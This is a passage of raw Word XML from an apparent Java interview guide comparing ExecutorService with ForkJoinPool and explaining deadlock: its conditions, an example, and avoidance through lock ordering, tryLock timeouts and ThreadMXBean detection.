    <w:p w14:paraId="17497EEF"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997534A"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divide-and-conquer tasks and is generally more efficient for parallel recursive tasks. It minimizes thread contention through its work-stealing mechanism.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D632E20"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2A3A20FB">
          <v:rect id="_x0000_i1831" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="20ED5F5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977"/>
        <w:gridCol w:w="4295"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C34595" w:rsidRPr="004E218C" w14:paraId="2CF49B0A" w14:textId="77777777" w:rsidTr="00C34595">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4D702F2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3CEBA9F"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ecutorService</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0CDA477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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C34595" w:rsidRPr="004E218C" w14:paraId="10BB5FC1" w14:textId="77777777" w:rsidTr="00C34595">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3EEC9D4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Designed for</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="165BAEE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General-purpose task execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5651872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Recursive and parallel tasks, divide-and-conquer</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C34595" w:rsidRPr="004E218C" w14:paraId="78BA90A9" w14:textId="77777777" w:rsidTr="00C34595">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7F552E8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Management</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="01E5D7F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reads are allocated in a fixed pool or cached</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="699AF51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Uses work-stealing to balance load among threads</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C34595" w:rsidRPr="004E218C" w14:paraId="444C4881" w14:textId="77777777" w:rsidTr="00C34595">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="284C918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Submission</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1C78359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Runnable or Callable tasks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4AAC051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ForkJoinTask (e.g., RecursiveTask)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C34595" w:rsidRPr="004E218C" w14:paraId="689D85CC" w14:textId="77777777" w:rsidTr="00C34595">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3D864E1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fficiency</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="646E77E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itable for independent tasks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7CFBF2C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Optimized for recursive, parallel tasks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C34595" w:rsidRPr="004E218C" w14:paraId="53F87837" w14:textId="77777777" w:rsidTr="00C34595">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7E22C44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Performance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="16D13B4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erforms well for independent tasks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="73DBD7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More efficient for recursive task splitting</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7E28C864"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30FFD1A">
          <v:rect id="_x0000_i1832" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9CB28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7F7A4F0A"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hen you have independent tasks that don’t require recursion.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12373D07"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ForkJoinPool</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> when you are working with divide-and-conquer tasks that can be recursively split into smaller tasks and processed in parallel. It’s more efficient for parallel recursive algorithms.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2780E212" w14:textId="0148353D"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3" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2A663B" w14:textId="6AFEA3FC" w:rsidR="00C836C6" w:rsidRPr="00CE4B95" w:rsidRDefault="003732DA">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="285" w:name="_Toc197867499"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain Deadlock and how do you avoid it in Java Multithreading</w:t>
      </w:r>
      <w:r w:rsidR="00C836C6" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="285"/>
    </w:p>
    <w:p w14:paraId="267650A3" w14:textId="40A757D3" w:rsidR="00A6755D" w:rsidRPr="004E218C" w:rsidRDefault="004E218C"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidR="00A6755D" w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>eadlock</w:t>
      </w:r>
      <w:r w:rsidR="00A6755D" w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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 deadlock occurs in a scenario where:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3672A6CF"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1</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67762DDC"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2</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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BCA48E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Since both threads are waiting for each other to release the resources, neither of them can proceed, resulting in a deadlock.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A5AD88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ditions for Deadlock:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A315F0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For a deadlock to occur, the following four conditions must hold simultaneously:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03175AED"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Mutual Exclusion:</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> At least one resource must be held in a non-shareable mode. Only one thread can access a resource at any given time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3207DF3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Hold and Wait:</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> A thread must be holding at least one resource and waiting for additional resources that are being held by other threads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="730BCFE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No Preemption:</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Resources cannot be preempted. Once a thread holds a resource, it cannot be taken away by another thread until it releases it voluntarily.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27347A63"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Circular Wait:</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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Deadlock in Java:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1766C7F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where two threads are trying to acquire two resources, leading to a deadlock:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D12170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1A0A98F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239B671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A, trying to lock ResourceB");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BCEC70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last();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B54F8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4B99410" w14:textId="77777777" w:rsidR="00A6755D" w:rsidRPr="004E218C" w:rsidRDefault="00A6755D" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E71FA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259E7F6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A last");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C896BB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F5AC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1E5FD10" w14:textId="77777777" w:rsidR="00A6755D" w:rsidRPr="004E218C" w:rsidRDefault="00A6755D" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F2A329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00E4AF2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601FC6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B, trying to lock ResourceA");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0D29D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A0A9F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498CA62" w14:textId="77777777" w:rsidR="00A6755D" w:rsidRPr="004E218C" w:rsidRDefault="00A6755D" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1498CE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531D1E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B last");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="234E580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F938E2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AC091C8" w14:textId="77777777" w:rsidR="00A6755D" w:rsidRPr="004E218C" w:rsidRDefault="00A6755D" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38A580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Example {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="404F9A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48E1468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055AE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0B0D7A65" w14:textId="77777777" w:rsidR="00A6755D" w:rsidRPr="004E218C" w:rsidRDefault="00A6755D" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F1D38C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3F18EE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resourceA.methodA(resourceB));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A85A95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34BF29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resourceB.methodB(resourceA));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A62AB9" w14:textId="77777777" w:rsidR="00A6755D" w:rsidRPr="004E218C" w:rsidRDefault="00A6755D" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15C1BE0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44A48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76D1B2D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5C796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4E8CB4A"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to Avoid Deadlock in Java?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61CBA4B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ere are several techniques that can be used to avoid deadlock in Java:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C7A90E3"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E5071C2">
          <v:rect id="_x0000_i1834" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="65154C3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Lock Ordering:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D19246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One of the most effective ways to prevent deadlock is to establish a strict order in which resources are acquired. All threads should acquire resources in the same order. If thread 1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then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then thread 2 should also acquire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before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489688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51FF140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41B02A9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1E5F62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4C616B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b.last();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506590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56DCD0" w14:textId="77777777" w:rsidR="00A6755D" w:rsidRPr="004E218C" w:rsidRDefault="00A6755D" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1661F2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69F0C4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A last");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA6EC3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C0CD7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3969BF4" w14:textId="77777777" w:rsidR="00A6755D" w:rsidRPr="004E218C" w:rsidRDefault="00A6755D" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33E9BE0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292CCD7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36D338C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60360F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4F88A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EAF12C" w14:textId="77777777" w:rsidR="00A6755D" w:rsidRPr="004E218C" w:rsidRDefault="00A6755D" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5932DEA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0F958DC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B last");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="776DF47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47A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7D454BC" w14:textId="77777777" w:rsidR="00A6755D" w:rsidRPr="004E218C" w:rsidRDefault="00A6755D" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57C393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AvoidDeadlockExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F8C27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649B9E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656DCF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40B3A4A9" w14:textId="77777777" w:rsidR="00A6755D" w:rsidRPr="004E218C" w:rsidRDefault="00A6755D" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46C0B0E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694F48A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21A364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145F95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31F9CE3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5769EF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B.methodB(resourceA);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1627057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2084A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30F3B3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A602F69" w14:textId="77777777" w:rsidR="00A6755D" w:rsidRPr="004E218C" w:rsidRDefault="00A6755D" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="170794F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18EB1FC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F2DD5E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6C74C2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565208E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242CAE4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A.methodA(resourceB);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6126DF9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B5D73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B28FEE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C734CA" w14:textId="77777777" w:rsidR="00A6755D" w:rsidRPr="004E218C" w:rsidRDefault="00A6755D" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B40F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76B2A40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3E4CCD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7D6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D4758A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acquiring the resources in the same order, deadlock is avoided.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="552015D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3F28DA5F">
          <v:rect id="_x0000_i1835" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF2D4E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Lock Timeout:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60DDE50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You can use </w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ReentrantLock</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (instead of synchronized) to set a timeout:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1437B6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locks.Lock;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3854DE6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import java.util.concurrent.locks.ReentrantLock;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE5BBAA" w14:textId="77777777" w:rsidR="00A6755D" w:rsidRPr="004E218C" w:rsidRDefault="00A6755D" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A5D27D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TimeoutExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72CE876C" w14:textId="77777777" w:rsidR="00A6755D" w:rsidRPr="004E218C" w:rsidRDefault="00A6755D" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="782E21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A = new ReentrantLock();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB6383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B = new ReentrantLock();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1596E5F4" w14:textId="77777777" w:rsidR="00A6755D" w:rsidRPr="004E218C" w:rsidRDefault="00A6755D" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59008A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04DE4BF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5F1405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1E2820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tryLock() &amp;&amp; lockB.tryLock()) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0467CE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acquired both locks");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D6C778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53345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could not acquire both locks, retrying");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AEF9B7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CF3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3884C2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5832BAA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2D301DC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F3CF4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630101" w14:textId="77777777" w:rsidR="00A6755D" w:rsidRPr="004E218C" w:rsidRDefault="00A6755D" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="362A37A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CA646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61E5E3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tryLock() &amp;&amp; lockA.tryLock()) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B54B8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acquired both locks");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C24D64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7C3D7E0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could not acquire both locks, retrying");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E185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7F74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4299896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17398C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15DEB1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3C83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9D8990" w14:textId="77777777" w:rsidR="00A6755D" w:rsidRPr="004E218C" w:rsidRDefault="00A6755D" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65B3462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2998501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5344719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3C6B0C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877C2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 the threads try to acquire the locks with tryLock(), and if they can't acquire both, they will back off and retry. This avoids deadlock.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="256C2DB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D4E3F83">
          <v:rect id="_x0000_i1836" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4222A14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3. Deadlock Detection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45919B1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4E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ThreadMXBean</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> from the java.lang.management package to detect deadlocks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF7EF6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lang.management.*;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA88D7A" w14:textId="77777777" w:rsidR="00A6755D" w:rsidRPr="004E218C" w:rsidRDefault="00A6755D" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C483E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Detection {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8E37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CE98F3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MXBean threadMXBean = ManagementFactory.getThreadMXBean();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67277D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100E02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Get the list of threads that are deadlocked</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A324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long[] deadlockedThreads = threadMXBean.findDeadlockedThreads();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B002F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deadlockedThreads != null) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056E295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long threadId : deadlockedThreads) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E352B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System.out.println("Deadlocked Thread ID: " + threadId);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E3E35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95675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3AA02D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No deadlocked threads found.");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C3BDF9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FFCF2B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F7B73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B3D5C8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is method can help you detect deadlocks during runtime and take corrective actions like restarting threads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C1377D1"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5DE745A0">
          <v:rect id="_x0000_i1837" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E85F6C"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ing Higher-Level Concurrency Utilities:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA18B8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Java provides higher-level concurrency utilities (lik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ountDownLatch</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yclicBarrier</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Semaphore</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
